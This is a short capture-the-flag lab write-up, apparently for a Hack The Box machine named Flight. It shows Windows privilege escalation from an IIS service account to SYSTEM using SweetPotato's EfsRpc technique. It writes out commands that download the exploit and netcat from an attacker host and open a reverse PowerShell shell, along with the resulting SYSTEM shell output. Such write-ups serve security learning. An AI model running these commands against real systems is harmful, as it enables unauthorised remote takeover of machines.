InfoSec LAB

Flight_Privilege_Escalation_2

Created: 2 min read

SweetPotato

The compromised iis-default account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. this makes the target system vulnerable to the potato exploits

I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 & Windows Server 2019 the target system is windows server 2019, so i will be using an alternative; sweetpotato

sweetpotato is a collection of various native windows privilege escalation techniques from service accounts to system. it has been created by @ethicalchaos and includes:

  •     RottenPotato
  •     Weaponized JuciyPotato with BITS WinRM discovery
  •     PrintSpoofer discovery and original exploit
  •     EfsRpc built on EfsPotato
  •     PetitPotam

exploit

Exploit binary is available online

Exploitation

ps c:\tmp> iwr -Uri http://10.10.16.8/potato/SweetPotato.exe -Outfile C:\tmp\SweetPotato.exe
ps c:\tmp> iwr -Uri http://10.10.16.8/potato/nc64.exe -Outfile C:\tmp\nc64.exe

Delivery complete Netcat will be used for a reverse shell payload for code execution

ps c:\tmp> cmd /c C:\tmp\SweetPotato.exe -p "C:\tmp\nc64.exe" -e EfsRpc -a "10.10.16.8 1234 -e powershell"
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] attempting np impersonation using method efsrpc to launch c:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/a733b8d5-3080-4df9-9cbb-4d96c472d501/\a733b8d5-3080-4df9-9cbb-4d96c472d501\a733b8d5-3080-4df9-9cbb-4d96c472d501
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

The command above uses the EFSRPC method, which targets the MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 1234         
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 54213
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
ps c:\Windows\system32> whoami
whoami
nt authority\system
ps c:\Windows\system32> hostname
hostname
g0
ps c:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::23d
   ipv6 address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   link-local ipv6 address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   ipv4 address. . . . . . . . . . . : 10.10.11.187
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks